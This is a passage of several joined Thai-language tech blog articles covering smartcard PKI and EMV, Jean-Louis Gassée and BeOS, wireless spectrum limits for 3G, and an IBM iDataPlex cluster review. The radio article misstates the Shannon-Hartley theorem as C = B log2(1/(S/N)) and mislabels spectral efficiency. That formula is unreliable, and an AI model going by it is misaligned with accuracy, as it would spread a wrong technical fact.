ไฟล์นี้สามารถรวมเข้าไว้ในเบราว์เซอร์ของเราเพื่อใช้ยืนยันว่าเราเป็นเจ้าของอีเมลที่มีอยู่ในใบรับรองได้ เราสามารถใช้ข้อมูลจากไฟล์รับรองนี้ส่งให้เว็บต่างๆ เพื่อใช้ล็อกอินอย่างปลอดภัยโดยไม่ต้องจำรหัสผ่านได้ แม้จะออกแบบมาเป็นอย่างดี แต่ในความเป็นจริงระบบนี้ก็ไม่ได้รับความนิยมนักเพราะใช้งานค่อนข้างยุ่งยาก ในระบบสมาร์ตการ์ด มีมาตรฐานที่เรียกว่า PKCS #11 ออกแบบให้สมาร์ตการ์ดเป็นที่เก็บกุญแจลับของเรา สมาร์ตการ์ดจะมีทั้งกุญแจลับและกุญแจสาธารณะที่ได้รับการรับรองจนเป็นไฟล์รับรองอยู่ในตัว เมื่อเราต้องการทำธุรกรรม เช่นการโอนเงิน เครื่องที่คอมพิวเตอร์ที่เราเสียบสมาร์ตการ์ดจะดาวน์โหลดไฟล์รับรองเพื่อตรวจสอบว่าเราได้รับการรับรองจากหน่วยงาน (เช่นกระทรวงมหาดไท ในกรณีบัตรประชาชน) จริงหรือไม่ เมื่อตรวจสอบแล้วถูกต้องจึงส่งค่าแฮชของไฟล์ข้อมูลที่เราจะกระทำ เช่นไฟล์ข้อมูลโอนเงิน เข้าไปยังสมาร์ตการ์ดเพื่อเข้ารหัสค่าแฮชออกมาเป็นลายเซ็นดิจิตอล การใช้สมาร์ตการ์ดมีข้อดีหลายข้อ คือกุญแจลับเป็นบัตรนั้นเก็บรักษาได้ง่าย และทำสำเนายากกว่า สมาร์ตการ์ดบางรุ่นต้องใส่รหัสผ่านสี่หลักเสมอ และจะทำลายกุญแจลับทันทีที่ใส่รหัสผิดครบจำนวนครั้งที่กำหนด ในโลกความเป็นจริง กุญแจลับของหน่วยงานออกใบรับรองนั้นก็มักเก็บรักษาเป็นสมาร์ตการ์ด โดยต้องมีเก็บใบสำเนาแยกไว้ และรักษาความปลอดภัยไว้เท่าเทียมกัน (เคยมีกรณีที่หน่วยงานเลินเล่อ ไม่สำรองบัตรแล้วทำ[กุญแจลับหายก็มีมาแล้ว แต่เป็นช่วงทดสอบโครงการ](https://www.blognone.com/news/12414/)) ทุกวันนี้บัตรสมาร์ตการ์ดสำหรับการจ่ายเงินมักเป็นบัตร EMV (Europay, MasterCard and Visa) ซึ่งแม้จะมีฟอร์แมตและ API ของบัตรต่างจากกระบวนการ PKI ใน PKCS #11 แต่หลักการก็ยังคงคล้ายกันคือการเซ็นใบรับรองต้องมาจากเจ้าของเครือข่ายอย่าง VISA ซึ่งจะใช้ใบรับรองขั้นกลางเซ็นใบรับรองให้กับหน่วยงานออกบัตร เช่น ธนาคาร เพื่อมารับรองบัตรเครดิตอีกที และบัตรจะยืนยันกระบวนการต่างๆ เช่น การจ่ายเงิน ได้ว่ามีการจ่ายเงินจริงด้วยบัตรตัวจริงหรือไม่
# [ย้อนตำนานไอที] Jean-Louis Gassée กับ Be OS และสตีฟ จ็อบส์ **หมายเหตุ:** วันอาทิตย์ไม่ค่อยมีข่าว ก็ขอเขียนบทความย้อนอดีตประวัติศาสตร์ที่น่าสนใจของวงการไอทีละกันนะครับ ผมคิดว่า บุคคลในวงการไอทีที่สตีฟ จ็อบส์ ควรจะรู้สึก "ขอบคุณ" ที่สุดในชีวิต อาจเป็น **ฌอง หลุยส์ กัสซี** (Jean-Louis Gassée) อดีตพนักงานชาวฝรั่งเศสของแอปเปิล และผู้บริหารแอปเปิลสาขาฝรั่งเศส ซึ่งพิจารณาจากผลงานต่างๆ แล้ว เราอาจถือว่าเขาเป็น "ร่างขนาน" ของสตีฟ จ็อบส์ก็ว่าได้ แต่สิ่งที่กัสซีสร้างบุญุคุณให้กับจ็อบส์มากที่สุด ไม่ได้เกิดขึ้นตอนที่ทั้งคู่กำลังทำงานกับแอปเปิล (โดนระเห็จออกมาทั้งคู่) และก็ไม่ใช่สิ่งที่ตัวของกัสซีเองตั้งใจให้มันเกิดขึ้นด้วยซ้ำ **ฌอง หลุยส์ กัสซี** หลังจากจ็อบส์โดนจอห์น สกัลลี สั่งปลดจากตำแหน่งบริหารในปี 1985 คนที่มานั่งคุมทีมแมคอินทอชแทนก็คือกัสซี (ซึ่งสร้างผลงานมาจากการคุมแอปเปิลในฝรั่งเศส) ซึ่งเขาก็ได้รับการยกย่องและยอมรับจากพนักงานระดับปฏิบัติงานสายวิศวกรรมเยอะมาก แต่หลังจากนั้น กัสซีแพ้การประลองกำลังภายในบริษัทกับฝ่ายบริหารสายอื่น และต้องออกจากบริษัทไปในปี 1990 สิ่งที่เขาทำหลังจากนั้นคือตั้งบริษัท Be Inc. ทำคอมพิวเตอร์ BeBox และระบบปฏิบัติการ BeOS สิ่งที่กัสซีทำนั้นขนานไปกับ NeXT ของจ็อบส์ ทั้งคอมพิวเตอร์ NeXT และระบบปฏิบัติการ NeXTSTEP นั่นคือเป็นระบบคอมพิวเตอร์สำหรับอนาคตในยุคนั้น ที่ก้าวหน้ากว่าทั้งแมคอินทอชและวินโดวส์ของไมโครซอฟท์ ช่วงกลางทศวรรษที่ 90s ตอนที่แอปเปิลเริ่มแย่มากๆ ไมโครซอฟท์กำลังรุ่งเรืองจาก Windows 95 แอปเปิลก็ตัดสินใจยอมถอยจากการทำ System (ชื่อในตอนนั้นของ Mac OS) ด้วยตัวเอง (เพราะโครงการใหญ่ล่มมาสองสามรอบ ส่วน Mac OS 8/9 เป็นแค่ตัวขัดตาทัพเท่านั้น) และหันมามองการซื้อกิจการบริษัทภายนอกเพื่อนำเทคโนโลยีมาทำ Mac OS รุ่นหน้าแทน สิ่งที่หลายคนอาจยังไม่รู้คือ **บริษัทแรกที่แอปเปิลตั้งใจจะซื้อไม่ใช่ NeXT แต่เป็น Be** การเจรจาทุกอย่างเกือบลงตัวหมดแล้ว แต่วินาทีสุดท้าย กัสซีต่อรองขอเงินเพิ่ม แอปเปิลไม่ยอมเจรจาต่อ แต่หันไปซื้อ NeXT แทน (ในราคาที่แพงกว่า Be ด้วย) ทั้งที่ตอนนั้น NeXT เองก็แทบจะไปไม่รอดอยู่เหมือนกัน จากนั้นที่เหลือก็เป็นไปตามประวัติศาสตร์ที่เรารู้กัน จ็อบส์กลับมาเป็น iCEO อยู่พักหนึ่ง, NeXTSTEP กลายเป็น Mac OS X, บิล เกตส์ ส่งวิดีโอคอนเฟอเรนซ์มาร่วมเวทีกับสตีฟ จ็อบส์ ในฐานะที่ไมโครซอฟท์ช่วยเข้ามาถือหุ้นแอปเปิลอยู่พักหนึ่ง... ส่วน Be ก็ล้มหายตายจากไปกับกาลเวลา และตอนนี้ก็เหลือเพียงโครงการ Haiku OS ที่พยายามจะพัฒนามันต่อในฐานะโคลนแบบโอเพนซอร์ส ตัวกัสซีย้ายไปทำงานกับ Palm และทรัพย์สินบางอย่างของ Be ก็ถูก Palm ซื้อไปทำระบบปฏิบัติการ Palm Cobalt ต่อ (ซึ่งสุดท้ายก็ล้มเหลวทั้งหมด) ตอนนี้กัสซีเหมือนจะไม่ได้ทำงานอะไรจริงจังแล้ว เป็นนักลงทุนอย่างเดียว เขาเปิดบล็อก [Monday Note](http://www.mondaynote.com/) และทวิตเตอร์ [@gassee](https://twitter.com/#!/gassee) ใครสนใจก็ตามไปอ่านกันได้ บางทีเขาก็เล่าเรื่องเก่าๆ สมัยอยู่แอปเปิลผ่านบล็อกบ้างเหมือนกัน ถ้าหากวันนั้น กัสซีไม่ละโมบเกินควร และสุดท้ายแอปเปิลซื้อ Be ได้สำเร็จ โลกไอทีจะเป็นอย่างไร และสตีฟ จ็อบส์ จะได้กลับมาที่แอปเปิลอีกหรือไม่ นั่นเป็นสิ่งที่เกิดในโลกคู่ขนานที่เราไม่มีทางคาดเดาได้เลยว่าโลกจะหมุนไปอย่างไร ในเวทีรวมศิษย์เก่าแอปเปิลช่วงต้นเดือนนี้ ([ข่าวที่ 9to5mac](http://9to5mac.com/2011/11/11/gassee-thank-god-apple-chose-steve-jobss-next-over-my-beos/)) เขาพูดถึงเหตุการณ์ในครั้งนั้นว่าเขาดีใจที่สุดท้ายแอปเปิลตัดสินใจซื้อ NeXT แทน Be เหตุเพราะเขาคงไม่สามารถทำงานร่วมกับฝ่ายบริหารของแอปเปิลได้ และสิ่งสำคัญที่สุดที่แอปเปิลได้มาจาก NeXT ไม่ใช่ระบบปฏิบัติการ NeXTSTEP แต่เป็นตัวสตีฟ จ็อบส์ต่างหาก เขายังบอกด้วยว่า จริงๆ แล้ว ความหมายของการซื้อกิจการครั้งนั้นคือ**จ็อบส์ซื้อแอปเปิลกลับ**ด้วยซ้ำ (โดยที่แอปเปิลเป็นฝ่ายให้เงิน) ถ้าผมเป็นสตีฟ จ็อบส์ ถึงแม้จะไม่ได้ขอบคุณกัสซีตรงๆ ก็คงคิดถึงเพลงไทยเพลงหนึ่งที่ร้องว่า "หากไม่มีเธอวันนั้น ฉันก็คงไม่มีวันนี้"
# คลื่นวิทยุกับการสื่อสารเบื้องต้น **แนะนำให้อ่านและทำความเข้าใจก่อนอ่านข่าว 3G ทุกข่าวช่วงนี้ครับ** จากข่าวมาตรฐานการให้บริการข้อมูล 2G/3G ของกสทช. ผมพบว่าแม้แต่ผู้อ่านของ Blognone เองที่น่าจะเป็นกลุ่มคนที่มีความรู้เทคโนโลยีมากกว่าเฉลี่ยของสังคมไทยโดยรวมก็ยังถูกการตลาดของค่ายผู้ให้บริการต่างๆ สร้างความหวังและความฝันว่าเมื่อเรามีเครือข่าย 3G ให้บริการกันแล้ว เราจะได้ใช้งานเครือข่ายที่ความเร็วสูงในระดับที่แทบจะไม่ต้องการวายฟายหรือบรอดแบนด์ตามบ้านกันอีกเลย ขณะที่เครือข่ายไร้สายระยะไกลอย่าง 3G เป็นความหวังของคนไทยอย่างมากว่าน่าจะสามารถเข้ามาขยายโอกาสในการเข้าถึงอินเทอร์เน็ตของคนไทยได้มากขึ้น การสื่อสารข้อมูลด้วยสัญญาณวิทยุมีข้อจำกัดในตัวมันเองหลายประการ และในการใช้งานข้อมูลมากๆ เช่น วิดีโอความสะเอียดสูง หรือการดาวน์โหลดไฟล์ขนาดใหญ่ อย่างต่อเนื่องโดยมีราคาต่ำที่ให้ทุกคนเข้าถึงได้นั้นกลับเป็นเรื่องที่เป็นไปได้ยาก บทความนี้ผมเขียนเพื่อแสดงข้อมูลพื้นฐานถึงข้อจำกัดโดยทั่วไปของการสื่อสารไร้สาย เราจะได้ตั้งความหวังกับมันได้อย่างตรงความเป็นจริง ### คลื่นวิทยุกับการการส่งข้อมูล ข้อมูลคอมพิวเตอร์นั้นเป็นข้อมูลดิจิตอลอย่างที่เรารู้กัน ว่ามันประกอบไปด้วยเลขศูนย์และหนึ่ง แต่ในคลื่นวิทยุนั้นการส่งคลื่นเป็นเพียงการบอกว่ามีคลื่นนั้นอยู่หรือไม่ จำเป็นต้องหาทางแปลงคลื่นวิทยุที่เราจับได้ในอากาศมาเป็นข้อมูลศูนย์และหนึ่งอีก กระบวนการหนึ่งที่เป็นไปได้ เช่น เมื่อส่งคลื่นนั้นไปในอากาศในถือว่าช่วงเวลานั้นเป็นการส่งข้อมูลหนึ่ง และเมื่อหยุดส่งให้ถือว่าว่าข้อมูลเป็นศูนย์ เมื่อเรากำหนดช่วงเวลาศูนย์และหนึ่งแต่ละตัวจะกินเวลานานเท่าใด เราก็สามารถจับคลื่นสัญญาณในอากาศออกมาเป็นข้อมูลเหมือนในสายไฟที่เราใช้งานกันได้ เทคนิคการแปลงข้อมูลให้เป็นคลื่นวิทยุนี้ เราเรียกว่ากระบวนการเข้ารหัสสัญญาณ (modulation) เทคนิคการเข้ารหัสสัญญาณมีมากมายหลากหลาย และได้รับการพัฒนาอย่างต่อเนื่องในช่วงหลายสิบปีที่ผ่านมา ทำให้เราสามารถส่งข้อมูลผ่านเครือข่ายไร้สายอย่างมีประสิทธิภาพขึ้นมาก วายฟายที่เราใช้งานทุกวันนี้ทำความเร็วเพิ่มขึ้นจาก 1 Mbps ในมาตรฐาน 802.11 ไปเป็น 300 Mbps ในมาตรฐาน 802.11n อย่างรวดเร็ว ### สัญญาณรบกวน สิ่งที่คู่กันกับการส่งข้อมูลผ่านคลื่นวิทยุ คือ สัญญาณรบกวนที่เป็นคลื่นวิทยุที่มีอยู่ในธรรมชาติทั่วไป ไม่ว่าจะเป็นจากการใช้งานของมนุษย์ด้วยกันเอง ไปจนถึงรังสีจากดวงอาทิตย์ที่ส่งมายังโลก ทำให้ทุกคลื่นความถี่ที่เราใช้งานกัน ล้วนมีคลื่นวิ่งอยู่ในอากาศความแรงคลื่นที่แต่ละความถี่ต่างๆ กันออกไปอย่างคาดเดาไม่ได้ โดยทั่วไปแล้วเมื่อสัญญาณรบกวนมีไม่มากนัก ก็จะไม่มีผลอะไรต่อการส่งข้อมูล เช่น เสียงที่เราได้ยินกันทุกวันนี้ (ซึ่งเป็นคลื่นแบบหนึ่งเช่นเดียวกัน) เรายังสามารถพูดคุยกันได้ คือ การรับรู้คลื่นที่ฝ่ายตรงข้ามส่งมา และแปลความหมายของข้อมูลได้ แม้จะมีเสียงรบกวนรอบข้างก็ตาม แต่หากเสียงรบกวนมีมากเกินไป เช่น มีเครื่องจักรทำงานอยู่ใกล้ๆ สัญญาณรบกวนก็จะเริ่มทำให้การพูดคุยทำได้ลำบาก สิ่งที่เราทำได้ เช่น การพูดให้เสียงดังขึ้น ก็สามารถทำให้แก้ปัญหาเสียงรบกวนเหล่านั้นได้ คลื่นโดยทั่วไปนั้น เมื่อเราใช้ส่งออกไปแล้วความแรงสัญญาณก็จะลดลงตามระยะทางที่เพิ่มขึ้น จนกระทั่ง ความแรงสัญญาณใกล้เคียงกับสัญญาณรบกวนในธรรมชาติจนแยกจากกันไม่ออกในที่สุด สัญญาณรบกวนและการที่คลื่นอ่อนแรงลงเช่นนี้ ทำให้ระยะทำการของการส่งข้อมูลวิทยุมีข้อจำกัด เช่น วายฟายในมาตรฐาน 802.11b นั้นจะมีระยะทำการในที่โล่งประมาณ 40 เมตร แต่ถ้าเราอยู่ในย่านที่มีคลื่นรบกวนสูงๆ เช่น ในเมือง หรือคอนโดที่มีการใช้งานคลื่นความถี่เดียวกันมากๆ สัญญาณรบกวนก็จะแรงขึ้น ทำให้ระยะทำการลดลง ### ประสิทธิภาพการใช้งานคลื่นความถี่ ประสิทธิภาพในการใช้งานคลื่นความถี่ (Spectral Frequency) เป็นตัวเลขที่บอกเราว่าเมื่อเรามีคลื่นอยู่ในมือเป็นความกว้างค่าหนึ่ง โดยความกว้างของคลื่นความถี่ คือ ความถี่ที่เริ่มใช้งานได้ไปจนถึงความถี่สุดท้ายที่ใช้งานได้ เราจะสามารถส่งข้อมูลผ่านคลื่นความถี่นั้นๆ ได้มากน้อยแค่ไหน เช่น วายฟาย 802.11b นั้นใช้คลื่นความถี่ 22MHz ตัวอย่างช่อง 1 ของวายฟาย คือ คลื่น 2401MHz – 2423MHz มีความกว้างทั้งหมด 22MHz และใช้ส่งข้อมูลได้ 11Mbps แสดงว่ามันมีประสิทธิภาพการใช้งานคลื่นความถี่ 0.5 bit/s/Hz มาตรฐานการส่งข้อมูลแบบใหม่ๆ ให้ประสิทธิภาพของคลื่นความถี่ที่ดีกว่าเดิมมาก มาตรฐานเก่าเช่น โทรศัพท์มือถือในระบบ AMPS ที่มีใช้งานถึงสามสิบปีแล้ว อาจจะมีประสิทธิภาพเพียง 0.0015 bit/s/Hz เท่านั้น ขณะที่มาตรฐานใหม่กว่านั้นเช่น GSM จะให้ประสิทธิภาพที่ 0.45 bit/s/Hz ส่วนมาตรฐานใหม่ๆ เช่น HSDPA สามารถให้ประสิทธิภาพได้สูงสุดถึง 8.44 bit/s/Hz วายฟายที่เราใช้งานอยู่ทุกวันนี้ก็พัฒนาขึ้นมาอยู่ในระดับ 2.4 bit/s/Hz ในมาตรฐาน 802.11n ประสิทธิภาพเหล่านี้แม้จะเพิ่มขึ้นไปเรื่อยๆ ตามเทคโนโลยีที่ดีขึ้น แต่ก็มีข้อจำกัดอยู่ โดยมีทฤษฎีบทที่เรียกว่า Shannon-Hartley Theorem ระบุว่า C = B log2(1/(S/N)) โดย C คือ ปริมาณข้อมูล bit/s ที่ใส่เข้าไปในช่องสัญญาณได้ B คือ ความกว้างของช่องสัญญาณที่ใช้ และ S/N คือความแรงสัญญาณเทียบกับความแรงของสัญญาณรบกวน สมการนี้บอกเราสองอย่าง คือ เมื่อเรามีสัญญาณรบกวนในสภาพแวดล้อมจริง เราสามารถเพิ่มประสิทธิภาพของการส่งข้อมูลได้สองวิธี คือ การส่งสัญญาณให้แรงขึ้น และการส่งผ่านช่องสัญญาณที่มีขนาดใหญ่ขึ้น ตัวอย่าง เช่น ในมาตรฐาน 802.11n นั้นอนุญาตให้ เพิ่มช่องสัญญาณไปได้ถึงความกว้าง 40MHz โดยตัวทฤษฎีบทนี้เองเป็นเพียงขีดจำกัดสูงสุดที่เป็นไปได้เท่านั้น ทุกวันนี้หากนำความกว้างช่วงคลื่นและความแรงสัญญาณต่อสัญญาณรบกวนที่เราใช้กันอยู่มาใส่ในสมการนี้จะพบว่าประสิทธิภาพที่เราได้รับต่ำกว่าสมการนี้ แต่เทคนิคในยุคหลังๆ จะเข้าใกล้มากขึ้นเรื่อยๆ การนำคลื่นความถี่กลับมาใช้ใหม่ คลื่นความถี่ที่เราส่งข้อมูลกัน แม้จะมีเพียงไม่กี่ช่องสัญญาณ เช่น 802.11b ในคลื่นย่าน 2.4GHz นั้นสามารถใช้งานได้พร้อมกัน 3 ช่องสัญญาณ แต่เราก็สามารถใช้งานกันได้กว้างขวาง เพราะเมื่อพ้นระยะสัญญาณของตัวส่งตัวหนึ่งไปไกลๆ แล้ว สัญญาณจากตัวส่งตัวนั้นก็จะอ่อนลงเรื่อยๆ จนกระทั่งไม่ต่างไปจากสัญญาณรบกวนในธรรมชาติ ก็จะสามารถใช้ช่องสัญญาณเดิมได้อีกครั้ง เรียกว่า การนำความถี่กลับมาใช้ใหม่ (Frequency Reuse) ในระบบที่มีการจัดการ เช่น ระบบโทรศัพท์มือถือนั้น ช่องสัญญาณจะถูกจัดวางอย่างเป็นระบบ มีการวางแผนว่าพื้นที่ใดควรใช้ช่องสัญญาณใด เพื่อสับหลีกการใช้คลื่นความถี่เดียวกันในพื้นที่ติดกัน ซึ่งจะทำให้รบกวนกันเองจนกระทั่งไม่มีใครสามารถส่งข้อมูลได้ การวางแผนนำคลื่นความถี่กลับมาใช้ซ้ำจะทำได้ง่ายขึ้น หากมีคลื่นจำนวนมาก แบนวิดท์ของคลื่นที่มีมากก็จะสามารถเว้นระยะห่างระหว่างคลื่นช่องเดียวกันได้ไกลขึ้น ในสภาพความเป็นจริง คลื่นไม่ได้แผ่ออกเป็นเป็นวงกลมเท่ากันทุกด้านเหมือนในภาพตัวอย่าง เนื่องจากเสาสัญญาณอาจจะบีบให้คลื่นไปด้านใดด้านหนึ่ง หรือสิ่งก่อสร้างอาจจะสะท้อนหรือปิดกั้นคลื่นบางด้านให้ระยะทางสั้นลง การออกแบบวางแผนคลื่นจึงมีความซับซ้อนขึ้นมาก แต่หลักการยังคงเดิม คือ ระยะทำการของคลื่นช่องสัญญาณหนึ่งๆ จะมีจำกัด และแต่ระยะทางที่มันจะแรงพอที่จะรบกวนการส่งข้อมูลบนช่องสัญญาณเดียวกันนั้นไกลกว่าระยะที่มันทำงานได้ ทำให้ต้องเว้นระยะที่ไม่ใช่ช่องสัญญาณนั้นออกไปช่วงหนึ่ง (นอกจากนี้ยังมีการเข้ารหัสสัญญาณแบบใหม่ๆ ยังเปิดให้มีการบริหารคลื่นแบบอื่นๆ แต่บทความนี้ละไว้) ในระบบโทรศัพท์นั้น เสาให้บริการโทรศัพท์มือถือต้นหนึ่งๆ อาจจะมีรัศมีให้บริการนับสิบกิโลมเตร กินพื้นที่นับร้อยตารางกิโลเมตร หากให้บริการบนคลื่นความถี่เพียงช่องสัญญาณเดียวก็จะสามารถให้บริการแชร์กันได้ตามความเร็วที่ทำได้ของมาตรฐานแต่ละตัว แล้วแบ่งกันไปตามจำนวนคนใช้งาน เช่น ในระบบ HSDPA สามารถส่งข้อมูลได้ 42Mbps ในพื้นที่การทำงานของเสาต้นเดียวกัน ทุกคนก็ต้องแชร์ช่องสัญญาณดียวกัน ทำให้หากมีคนใช้งาน 10 คนพร้อมกันก็ไม่สามารถทำความเร็วได้เกิน 4.2Mbps ไปได้ การวางแผนจัดการช่องสัญญาณอาจจะใช้เทคนิคอื่นๆ เช่น การลดกำลังส่งของเสาสัญญาณลง ทำให้รัศมีการให้บริการต่ำลง แล้ววางเสาให้ถี่ขึ้นทำให้ผู้ใช้บริการต่อเสาแต่ละต้นนั้นมีจำนวนน้อยลง ในเมืองใหญ่ที่ประชากรหนาแน่นอาจจะมีการวางเสา microcell ที่มีรัศมีทำการเพียงหลักร้อยเมตร จนกระทั่งมีการเสนอบริการ femtocell ที่มีรัศมีให้บริการไม่กี่สิบเมตร พอๆ กับวายฟาย มันช่วยผู้ให้บริการสามารถนำคลื่นความถี่มาใช้ซ้ำได้มากในเมืองใหญ่ที่ประชากรหนาแน่น ผู้ใช้กระจุกตัว แต่ก็สามารถวางเสาสัญญาณได้ง่ายเพราะสาธารณูปโภคพร้อม ขณะที่การวางเสาสัญญาณในพื้นที่ห่างไกล ความหนาแน่นประชากรต่ำอาจจะวางเสากำลังส่งสูงเพื่อจะสามารถให้บริการได้ครอบคลุมพื้นที่เป็นหลัก บริการที่ผู้ใช้สามารถเคลื่อนที่ไปได้อิสระอย่างโทรศัพท์มือถือยังมีความซับซ้อน เช่น กรณีที่ผู้ใช้รวมตัวกันมากๆ เป็นการชั่วคราวในพื้นที่ที่ปกติมีผู้ใช้งานน้อย พื้นที่นั้นอาจจะวางเสาสัญญาณไว้ให้สามารถให้บริการได้ไกลๆ เป็นหลัก แต่เมื่อผู้ใช้มารวมกันก็เกิดการแย่งช่องสัญญาณกันจนใช้มงานไม่ได้ เหมือนที่เราประสบปัญหาเมื่อมีงานคอนเสิร์ต หรืองานอีเวนต์อื่นๆ แล้วมีคนไปรวมตัวในที่เดียวกันจำนวนมากๆ แล้วไม่สามารถใช้งานโทรศัพท์มือถือได้ ### การสื่อสารไร้สายกับการทดแทนการสื่อสารแบบมีสาย ขณะที่การสื่อสารแบบไร้สายสร้างความสะดวกสบายอย่างมากในช่วงยี่สิบปีให้หลังมานี้ แต่ข้อจำกัดของการสื่อสารแบบไร้สาย ไม่ว่าจะเป็นระบบ 3G หรือวายฟายก็ยังมีปัญหาของมันเองอยู่ ความได้เปรียบของรัศมีการให้บริการที่ไกล และเสียค่าติดตั้งน้อยกว่า แลกมากับการที่บริการเหล่านี้ต้องให้บริการบนคลื่นความถี่ที่มีจำกัด การเพิ่มกำลังส่งให้ไกลขึ้นเรื่อยๆ จะช่วยให้สามารถให้บริการพื้นที่ห่างไกลได้ดีขึ้น แต่ก็ทำให้จำนวนคนที่ต้องใช้ช่องสัญญาณร่วมกันมีมากขึ้นด้วยเช่นเดียวกัน การสื่อสารแบบไร้สายเหมาะสมที่จะมีไว้เพื่อใช้ร่วมกับการสื่อสารแบบมีสายอย่างที่เราใช้กัน เช่น บริการบรอดแบนด์ที่แม้จะมีสายโทรศัพท์มาถึงบ้านเรา แต่เราก็มักเชื่อมต่อคอมพิวเตอร์ของเราเองผ่านอินเทอร์เน็ตด้วยวายฟายในบ้านของเราเองอีกทีหนึ่ง การใช้งานแบบไร้สายเป็นทางเลือกเดียวเมื่อมีการเคลื่อนที่ไปเรื่อยๆ เพราะเราไม่สามารถเชื่อมต่อสายกับยานพาหนะที่กำลังเคลื่อนที่อยู่ได้ หรือการให้บริการในพื้นที่ห่างไกล ที่ปกติแล้วไม่คุ้มค่าที่จะให้บริการแบบมีสาย เช่น หมู่บ้านที่ความหนาแน่นประชากรต่ำ บ้านแต่ละหลังอยู่ห่างกันมาก การให้บริการแบบไร้สายที่มีรัศมีให้บริการไกลๆ เช่น 3G ทำให้คนในพื้นที่เหล่านี้สามารถเข้าถึงอินเทอร์เน็ตได้ง่ายขึ้น ขณะที่การให้บริการแบบมีสายนั้นยังมีข้อดีที่สามารถทำความเร็วได้เพิ่มขึ้นไปเรื่อยๆ ทุกวันนี้โครงสร้างพื้นฐานหลักมักใช้ผ่านสายไฟเบอร์ออปติกส์ที่สามารถทำความเร็ว 40Gbps ได้ไม่ยากนัก การเดินสายไฟเบอร์ออปติกส์มักเดินสายไว้ทีละจำนวนมากๆ เพราะค่าดำเนินการเดินสายมีราคาแพง จึงสามารถนำสายที่ยังไม่ได้ใช้งานมาใช้งานได้เพิ่มขึ้นเรื่อยๆ หรือกระทั่งเดินสายใหม่หากจำเป็น ขณะที่คลื่นความถี่วิทยุนั้นไม่สามารถหามาเพิ่มได้เรื่อยๆ เหมือนสายเหล่านี้
# [รีวิว] IBM System x iDataplex ขอเปลี่ยนบรรยากาศ มา Review Server Platform บ้างนะครับ แก้เลี่ยนการรีวิวกองทัพหุ่นยนต์ ทีมงานของผมได้มีโอกาสร่วมติดตั้งระบบคลัสเตอร์สมรรถนะสูง PHOENIX ของ ภาควิชาเคมี คณะวิทยาศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย ซึ่งเป็นระบบคลัสเตอร์แรกในประเทศไทย ที่สร้างด้วยแพลตฟอร์ม IBM iDataPlex แบบเต็มรูปแบบ วันนี้เลยจะลองนำเสนอรายละเอียดของเจ้า แพลตฟอร์มตัวนี้ว่าของจริงเป็นอย่างไรครับ ทั้งนี้ต้องขอขอบคุณ [บริษัท eLife System จำกัด](http://www.elife.co.th/) โดย [2BeSHOP.com](http://www.2beshop.com/) และบริษัท [IBM ประเทศไทย](http://www.ibm.com/th/en/) ในส่วนของฮาร์ดแวร์ต่างๆ รวมไปถึงรูปภาพเกือบทั้งหมดในบทความนี้ และทางภาควิชาเคมี ที่อนุญาตให้เขียนรีวิวฉบับนี้ครับ ## สเปคของ iDataPlex iDataPlex เป็นแพลตฟอร์มเซิร์ฟเวอร์ใหม่ ในกลุ่ม System X (เซิร์ฟเวอร์ตระกูล Intel/AMD ของ IBM) เพื่อรองรับเซิร์ฟเวอร์จำนวนมากในพื้นที่จำกัด โดย iDataplex เหมาะกับงานประเภทที่ต้องการเซิร์ฟเวอร์จำนวนมากๆ เช่น การประมวลผลสมรรถนะสูง (HPC) หรือการทำเซิร์ฟเวอร์ฟาร์ม ลองมาดูสเปคของ iDataplex ตามเอกสารกันเลยดีกว่า ### ตัวตู้ - รองรับอุปกรณ์ได้ 100U ในพื้นที่ตู้ Rack เดียว (เซิร์ฟเวอร์ 84U และอุปกรณ์อื่นๆอีก 16U) - ลดปริมาณพลังงานที่แต่ละเซิร์ฟเวอร์ต้องการได้มากที่สุด 40% เมื่อเทียบกับเซิร์ฟเวอร์ 1U ทั่วๆไป และมีการออกแบบระบบระบายความร้อนเป็นพิเศษเพื่อรองรับเครื่องจำนวนมาก - มีอุปกรณ์พิเศษชื่อว่า IBM Rear Door Heat eXchanger ว่าง่ายๆคือเป็นฝาตู้แบบพิเศษ หล่อเย็นด้วยของเหลว (อันนี้ไม่ได้เป็นส่วนประกอบมาตรฐานต้องสั่งเพิ่ม) ### เซิร์ฟเวอร์ เซิร์ฟเวอร์ที่จะติดตั้งใน iDataplex จะต้องเป็นซีรีส์ dx360 ซึ่งจะมีหลายรุ่นหลายแบบให้เลือก โดยรายละเอียดคร่าวๆมีดังนี้ - ถ้าเทียบกับเซิร์ฟเวอร์ Rack จะมีขนาด 1U-3U - ใช้ CPU Intel Xeon เป็นหลัก ปัจจุบันรองรับรุ่น 5500/5600 และรองรับได้มากที่สุด 2 CPU - รองรับหน่วยความจำถึง 256GB ต่อเครื่อง - รองรับ SAS/SATA และทำ RAID และมีทั้งรุ่นที่รองรับและไม่รองรับ Power Supply สำรอง - มีอุปกรณ์ Remote Management ตามปกติของ IBM เช่น Integrated Management Module (IMM) ซึ่งเข้ากันได้กับมาตรฐาน IPMI 2.0 ## ระบบคลัสเตอร์ PHOENIX มาที่ระบบจริงกันบ้าง คลัสเตอร์ PHOENIX เป็น iDataplex ที่ใช้เซิร์ฟเวอร์ IBM dx360 M3 จำนวน 76 เครื่อง แต่ละเครื่องมี Intel Xeon E5620 2.4GHz จำนวน 2 CPU x 4 core รวมทั้งหมดเป็น 8 Core ต่อเครื่อง ทำให้ทั้งระบบมี 608 core สำหรับการประมวลผล และมีหน่วยความจำ 16GB ต่อเครื่อง ฮาร์ดดิสก์ภายในเครื่องละตัวขนาด 300GB พร้อม Power Supply สำรอง เรื่อง Power Supply สำรองนี้สามารถเลือกให้มีหรือไม่มีก็ได้ครับ เพราะในงานสายนี้ส่วนใหญ่จะมีการทำ Redundancy ในระดับซอฟต์แวร์อยู่แล้ว ส่วนระบบเครือข่ายจะมีสองส่วน ส่วนแรกเป็น Gigabit Ethernet ไว้ใช้จัดการระบบ และมี Infiniband 40Gbps เป็นเครือข่ายสำหรับประมวลผลแอพลิเคชันอีกชุด จากรูปเส้นสีดำๆที่เสียบทางขวาคือสาย Infiniband ครับ ส่วนเส้นสีเหลืองๆคือสาย Gigabit Ethernet นอกจากนี้จะมีเครื่องควบคุมอีก 4 เครื่อง รวมแล้วจึงมี 80 x 8 = 640 CPU core ทั้งระบบ จะเห็นว่า iDataplex จะมีการเดินสายแลน และสาย Infiniband ไว้ให้ทางด้านหน้า เซิร์ฟเวอร์ dx360 จะจัดวางอุปกรณ์สายทั้งหลายจะอยู่ด้านหน้าทั้งหมด ด้านหลังของเครื่องจะมีแต่สายไฟเท่านั้น 